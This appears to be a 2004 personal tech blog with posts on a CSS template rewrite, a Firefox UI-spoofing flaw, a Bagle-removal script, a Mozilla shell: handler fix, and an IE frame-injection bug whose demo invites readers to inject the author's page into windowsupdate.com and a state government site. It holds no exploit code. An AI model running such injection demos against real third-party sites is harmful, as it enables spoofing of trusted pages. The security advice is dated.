invisibill.net

I went through and converted my old Blogger template to use CSS instead of tables a while back. I basically just changed each individual item from the old method to the new, standard method. I had some minor issues with it, and it was still pretty cluttered.

So the other day I went through and rewrote the template from scratch. Excluding the Blogger-specific include tags, my template file validates as XHTML 1.0 Strict. It looks almost exactly like the original (some changes I actually prefer, but could do like the original). I’m rather proud of that, considering how it started out, and the fact that I never learned CSS proper.

The template itself is much simpler now. Rather than having odd things nested all over the place, the document is structured more clearly with less stuff mixed in. The external stylesheet means I can change the layout much more easily, and add alternate options. The whole page should be much easier to maintain now.

I’m having some issues with PHP includes, and some of my posts aren’t valid individually, so invisibill.net itself doesn’t validate, but I know exactly where the problems are, and they’re very minor. But the base template for the page is valid!

A new major security issue has been found in Firefox. In short, websites have access to the UI elements. With some fancy coding, they can use the actual UI components to create a spoofed browser window. They have access to all the UI parts, so they can add anything they want (like the secure padlock icon, the security certificate page, etc.). They can spoof a UI that looks however they want. Rather than having to actually have a fake SSL site that looks like a valid site, someone could just use the UI objects to make it look like that.

http://www.nd.edu/~jsmith30/xul/test/spoof.html has details. The biggest limit on this spoof is that the site has no way of knowing what your current preferences are. The attacker could make it look like the default (which most people probably don’t change), but he has no way to copy your exact config. If you have some of the Javascript functions disabled, it will interfere with the spoofing, and look not-quite-right.

Until this is fixed, it’s best to prevent Javascript from changing the statusbar. [Tools | Options | Web Features | Advanced | Hide the status bar] is where you’ll find the option. If you disable that, you will see the real status bar in his window, with his spoofed statusbar above that. Unfortunately, that’s about the only way to be 100% sure of this. I suggest disabling that anyway. It will mean you always have the status info on the current window.

http://secunia.com/advisories/12188/ is the Secunia bulletin. http://bugzilla.mozilla.org/show_bug.cgi?id=244965 and http://bugzilla.mozilla.org/show_bug.cgi?id=252198 are applicable bug listings.

Tomorrow is the fifth annual System Administrator Appreciation Day. Check out http://www.sysadminday.com/ to make sure you haven’t missed any sysadmins, then thank them for doing techie stuff so you don’t have to.

I’m back to my old tricks again. I modified my old Bagle removal scripts to handle the new ones (.af, .ag, and .ai).

http://files.invisibill.net/unbagle.af.ag.ai.inf will remove the registry entries that run the program on startup and the file called by that registry entry. The descriptions I’ve read say that they create other files which contain some of the code. This script will not remove those files, or any of the copies spread via network shares. However, it will delete the startup calls, and the direct targets of those calls (if not in use). After running this script, immediately rebooting should give you a system without Bagle running. You will still need to clean the other files with a virus scanner, but this script should at least keep the viruses from running constantly, which is helpful because they try to shut down firewall and AV programs that are running.

Just save the file somewhere convenient, then right-click and choose Install. If you don’t trust me for whatever reason, you can open the script with any text editor and see that it just tries to delete three registry entries and three files. Once you’ve “installed” it, reboot. Your machine will still have virus-related files on it, but they shouldn’t autorun after you reboot, allowing you to more easily clean your system.

I found http://espn.go.com/browserupgrade_long.html#longanswer today. It does a pretty good job of explaining the concepts behind web standards.

We’d like to make perfectly clear that we are not trying to get you to use Microsoft browsers, Netscape browsers, Apple browsers, or Opera browsers. This is not about telling you what brand of browser to use. It is only about alerting you to the fact that each of the companies above, plus a few more, makes a modern, standards-compliant browser which you can easily (and freely) switch to using the links on the upper left side of this page.

I’m in that same boat as far as coding and stuff. I don’t care what you use, so long as it’s something that supports modern standards. I personally like Firefox, as I’m sure you’ve noticed by now. I could also call them on the standards support in Microsoft’s browser, but the main stuff is mostly right, enough that a modern version of IE should make the page look presentable at least. As sites start to use the newer standard code (just like the link says), I think people will see for themselves the shortcomings in IE and other browsers. Either they’ll complain enough to get the browser fixed, or they’ll switch to another browser that doesn’t have that problem.

Anyway, just thought this was a good explanation for non-techies…

http://www.eweek.com/article2/0%2C1759%2C1621438%2C00.asp

Current versions of Mozilla and Firefox pass unknown protocol handlers to the operating system shell to handle. In this case, the location passed to the shell is a program name that the shell executes.

In short, Mozilla hands off the unknown command to the OS to take care of. This causes the OS to run the program, with no warning.

http://www.mozillazine.org/talkback.html?article=4960 has information about new releases of Firefox, Thunderbird, and Mozilla that fix this problem by disabling calls to the shell: scheme. If you don’t want to upgrade, you can manually turn off scheme: calls.

1. Type about:config in the URL bar.
2. Right-click and select New -> Boolean.
3. Enter the preference name network.protocol-handler.external.shell in the box.
4. If it already exists, the Value box will have the current value. Type false to add/edit the value.

If you’re not comfortable doing that manually, the MozillaZine link above has an XPI installer to change the default preference for you. Once you’ve installed the XPI, you can use about:config and filter for network.protocol-handler.external.shell to make sure the value is properly set to false.

The IE vulnerability I mentioned is actually present in many browsers, including Mozilla and Opera. http://secunia.com/advisories/11978/ has details. Since Windows Update will only work with IE, my demo won’t work on these other browsers. Use the Secunia demo or this new one I made up. It’s the first site I found on Google searching for frames.htm - http://www.isp.state.il.us/sor/frames.htm. Click that to open it in a new window. Once that’s open, come back here and inject invisibill.net into the other window. Good fun!

I just wanted to post this update so that people didn’t think I was purposely trying to hide the fact that other browsers have this bug also…

Well, it’s newly discovered, but it’s a six year old bug… http://secunia.com/advisories/11966/ Basically, IE doesn’t check which window a frame is in, so window #1 can open a page inside a frame in window #2. This has been verified on a fully patched WinXP/IE6.

Here’s an example. www.windowsupdate.com will open in a new window. Once that’s loaded, come back here and inject invisibill.net into Windows Update. Switch back to the Windows Update window, and tell me what you see.

Now imagine if I had used a fake updates page linked to spambots and keyloggers instead of my obviously-not-WindowsUpdate page… It seems like no matter how many major IE bugs get fixed, there’s always another one coming up…

Business Week Online - Internet Explorer Is Just Too Risky

In late June, network security experts saw one of their worst fears realized. Attackers exploited a pair of known but unpatched flaws in Microsoft’s Web server software and Internet Explorer browser to compromise seemingly safe Web sites. People who browsed there on Windows computers got infected with malicious code without downloading anything.

I’ve been growing increasingly concerned about IE’s endless security problems, and this episode has convinced me that the program is simply too dangerous for routine use.

eWeek - Internet Explorer Is Too Dangerous to Keep Using

In the few days that the sites provided the Trojan horses, hundreds of thousands or millions of users could have had their credit-card, stock-brokerage and bank-account numbers and passwords stolen.

Let me repeat myself: Millions of you may have every bit of your browser-driven online financial security information stolen.

Maybe this was just another massive Internet security prank. Maybe all that will happen is a DDoS attack. Well, you can hope that’s all there is to it and continue to use IE. But as for me, I’m done with it.

Use whatever browser you wish. You know my feelings on the subject by now.

Stop and think about what every security professional already knows. Once an unknown program is installed on a system, the only true way to be totally safe is to wipe the whole system and start over. It sounds extreme, but you don’t know what the program can do. There are ways to limit what a program can do, but on most home PCs these measures aren’t in place (because it also makes it harder to use legitimately). Perhaps it rewrote system files, so that now anything you type is sent to the author. Even if you don’t do any financial stuff online, it could log the account numbers you type into your spreadsheet or financial program. “But my firewall will stop it!” If it could get into your system files, I guarantee it could modify your firewall’s files as well. In general, your overlapping security systems (you do have at least one firewall and anti-virus, right?) should detect problems before they do damage, but it’s not always possible. If one of these malicious programs wanted to be really devestating, it could rewrite itself after doing its dirty deeds - when the final version was analyzed, it would appear to be harmless (or at least less harmful), hiding the true damage.

http://webstandards.org/buzz/archive/2004_06.html#a000366

There is no question in my mind that the consumer has far more power than we poor schmucks fighting for Web standards. With coverage like this, we can help facilitate a more important revolution: Get people to use well-built software and let the losers dig their own graves.

Get people to use well-built software and let the losers dig their own graves. That about sums it up for me.